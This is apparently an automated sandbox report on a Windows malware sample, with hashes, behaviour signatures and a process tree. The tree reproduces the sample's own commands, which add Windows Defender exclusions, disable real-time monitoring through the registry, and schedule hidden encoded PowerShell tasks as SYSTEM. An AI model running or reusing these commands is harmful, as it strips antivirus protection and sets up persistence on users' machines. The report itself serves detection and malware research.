Analysis

  • max time kernel
    223s
  • max time network
    230s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    08/07/2024, 05:03 UTC

General

  • Target

    7c84fe67020dd7a906e01d302915aad5c0153729a4aa56fd71bc45dff4d92a56.exe

  • Size

    7.3MB

  • MD5

    ad7f2a7bfc3a95fef273ace9a215c988

  • SHA1

    5044a0cc66519fdcfbfbf232954c27e2527d29c6

  • SHA256

    7c84fe67020dd7a906e01d302915aad5c0153729a4aa56fd71bc45dff4d92a56

  • SHA512

    66cceedb92d3b5b38005c0016900dfaf9e40b4a0ea66bf617355e20e8084214d2f1d31ebe68bac74b898209dfccd5669afd245494c30d4ddd18c3bae1667cc1d

  • SSDEEP

    196608:91O5X2jQimknPT+pXYzohYye6NDw2yBtJHl:3O5XlZUPS68mye2DXyvJHl

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 24 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 63 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7c84fe67020dd7a906e01d302915aad5c0153729a4aa56fd71bc45dff4d92a56.exe
    "C:\Users\Admin\AppData\Local\Temp\7c84fe67020dd7a906e01d302915aad5c0153729a4aa56fd71bc45dff4d92a56.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1760
    • C:\Users\Admin\AppData\Local\Temp\7zS41D1.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2352
      • C:\Users\Admin\AppData\Local\Temp\7zS4441.tmp\Install.exe
        .\Install.exe /BdidFTzS "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2712
        • C:\Windows\SysWOW64\forfiles.exe
          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2548
          • C:\Windows\SysWOW64\cmd.exe
            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2604
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2628
              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                7⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1660
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "bYIjjyXTgczhZAJGMW" /SC once /ST 05:08:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp\nvWBhgZuGqtwSPP\jlvUgcu.exe\" om /UdidBEQ 525403 /S" /V1 /F
          4⤵
          • Drops file in Windows directory
          • Scheduled Task/Job: Scheduled Task
          PID:1148
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2712 -s 604
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:1672
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {DFB8EB59-A1DB-4ED2-A43E-1197300EBB0B} S-1-5-18:NT AUTHORITY\System:Service:
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2656
    • C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp\nvWBhgZuGqtwSPP\jlvUgcu.exe
      C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp\nvWBhgZuGqtwSPP\jlvUgcu.exe om /UdidBEQ 525403 /S
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:2840
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /CREATE /TN "gddbOEtKo" /SC once /ST 04:16:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:352
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /run /I /tn "gddbOEtKo"
        3⤵
          PID:1116
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /DELETE /F /TN "gddbOEtKo"
          3⤵
            PID:2452
          • C:\Windows\SysWOW64\cmd.exe
            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
            3⤵
              PID:940
              • C:\Windows\SysWOW64\reg.exe
                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                4⤵
                • Modifies Windows Defender Real-time Protection settings
                PID:1548
            • C:\Windows\SysWOW64\cmd.exe
              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
              3⤵
                PID:1420
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                  4⤵
                  • Modifies Windows Defender Real-time Protection settings
                  PID:1704
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /CREATE /TN "gWIwmfRNP" /SC once /ST 04:18:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:2592
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /run /I /tn "gWIwmfRNP"
                3⤵
                  PID:1948
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /DELETE /F /TN "gWIwmfRNP"
                  3⤵
                    PID:1620
                  • C:\Windows\SysWOW64\forfiles.exe
                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                    3⤵
                      PID:2320
                      • C:\Windows\SysWOW64\cmd.exe
                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                        4⤵
                          PID:2700
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                            5⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2664
                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                              6⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2752
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:32
                        3⤵
                          PID:2916
                          • C:\Windows\SysWOW64\reg.exe
                            REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:32
                            4⤵
                            • Windows security bypass
                            PID:2576
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:64
                          3⤵
                            PID:2688
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:64
                              4⤵
                              • Windows security bypass
                              PID:2404
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:32
                            3⤵
                              PID:2560
                              • C:\Windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:32
                                4⤵
                                  PID:548
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:64
                                3⤵
                                  PID:840
                                  • C:\Windows\SysWOW64\reg.exe
                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:64
                                    4⤵
                                      PID:3008
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C copy nul "C:\Windows\Temp\RkUDfeHyKRZhrXlO\KtpthcnL\HIzopuZuwQofSIBu.wsf"
                                    3⤵
                                      PID:3000
                                    • C:\Windows\SysWOW64\wscript.exe
                                      wscript "C:\Windows\Temp\RkUDfeHyKRZhrXlO\KtpthcnL\HIzopuZuwQofSIBu.wsf"
                                      3⤵
                                      • Modifies data under HKEY_USERS
                                      PID:2628
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFFblPWVSTUU2" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2176
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFFblPWVSTUU2" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:1920
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OniiUkVuU" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2536
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OniiUkVuU" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2948
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2160
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2108
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eveqWKwISMUn" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2172
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eveqWKwISMUn" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:1736
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oMPLyiqsgsRtC" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2444
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oMPLyiqsgsRtC" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:1084
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RfQdYYQjhFJxkqVB" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:1748
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RfQdYYQjhFJxkqVB" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2860
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2020
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:848
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:1712
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:2016
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                        • Windows security bypass
                                        PID:2256
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:532
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFFblPWVSTUU2" /t REG_DWORD /d 0 /reg:32
                                        4⤵
                                          PID:3052
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFFblPWVSTUU2" /t REG_DWORD /d 0 /reg:64
                                          4⤵
                                            PID:2164
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OniiUkVuU" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                              PID:1288
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OniiUkVuU" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                                PID:2580
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR" /t REG_DWORD /d 0 /reg:32
                                                4⤵
                                                  PID:2500
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YKxKHFRmqrfWRbNUYLR" /t REG_DWORD /d 0 /reg:64
                                                  4⤵
                                                    PID:2380
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eveqWKwISMUn" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                      PID:836
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eveqWKwISMUn" /t REG_DWORD /d 0 /reg:64
                                                      4⤵
                                                        PID:1996
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oMPLyiqsgsRtC" /t REG_DWORD /d 0 /reg:32
                                                        4⤵
                                                          PID:692
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oMPLyiqsgsRtC" /t REG_DWORD /d 0 /reg:64
                                                          4⤵
                                                            PID:1680
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RfQdYYQjhFJxkqVB" /t REG_DWORD /d 0 /reg:32
                                                            4⤵
                                                              PID:1284
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\RfQdYYQjhFJxkqVB" /t REG_DWORD /d 0 /reg:64
                                                              4⤵
                                                                PID:1068
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                4⤵
                                                                  PID:2132
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                  4⤵
                                                                    PID:2528
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp" /t REG_DWORD /d 0 /reg:32
                                                                    4⤵
                                                                      PID:2516
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ClVBtfBcTpyyeRnZp" /t REG_DWORD /d 0 /reg:64
                                                                      4⤵
                                                                        PID:1008
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:32
                                                                        4⤵
                                                                          PID:704
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\RkUDfeHyKRZhrXlO" /t REG_DWORD /d 0 /reg:64
                                                                          4⤵
                                                                            PID:1728
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /CREATE /TN "gJqcGvoOz" /SC once /ST 01:01:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                          3⤵
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:1236
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /run /I /tn "gJqcGvoOz"
                                                                          3⤵
                                                                            PID:2600
                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                            schtasks /DELETE /F /TN "gJqcGvoOz"
                                                                            3⤵
                                                                              PID:344
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                              3⤵
                                                                                PID:1240
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                  4⤵
                                                                                    PID:644
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                  3⤵
                                                                                    PID:1988
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                      4⤵
                                                                                        PID:2632
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      schtasks /CREATE /TN "akamOyUwOLVWEybrw" /SC once /ST 01:57:41 /RU "SYSTEM" /TR "\"C:\Windows\Temp\RkUDfeHyKRZhrXlO\WooAMnjmsKoKBAB\mqcBDmi.exe\" 0O /NqUMdidsP 525403 /S" /V1 /F
                                                                                      3⤵
                                                                                      • Drops file in Windows directory
                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                      PID:2568
                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                      schtasks /run /I /tn "akamOyUwOLVWEybrw"
                                                                                      3⤵
                                                                                        PID:1060
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2840 -s 328
                                                                                        3⤵
                                                                                        • Loads dropped DLL
                                                                                        • Program crash
                                                                                        PID:1920
                                                                                    • C:\Windows\Temp\RkUDfeHyKRZhrXlO\WooAMnjmsKoKBAB\mqcBDmi.exe
                                                                                      C:\Windows\Temp\RkUDfeHyKRZhrXlO\WooAMnjmsKoKBAB\mqcBDmi.exe 0O /NqUMdidsP 525403 /S
                                                                                      2⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • Drops Chrome extension
                                                                                      • Drops file in System32 directory
                                                                                      • Drops file in Program Files directory
                                                                                      • Modifies data under HKEY_USERS
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      PID:3060
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /DELETE /F /TN "bYIjjyXTgczhZAJGMW"
                                                                                        3⤵
                                                                                          PID:2160
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                          3⤵
                                                                                            PID:1312
                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                              forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                              4⤵
                                                                                                PID:1656
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                  5⤵
                                                                                                    PID:2800
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                      6⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Drops file in System32 directory
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:2056
                                                                                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
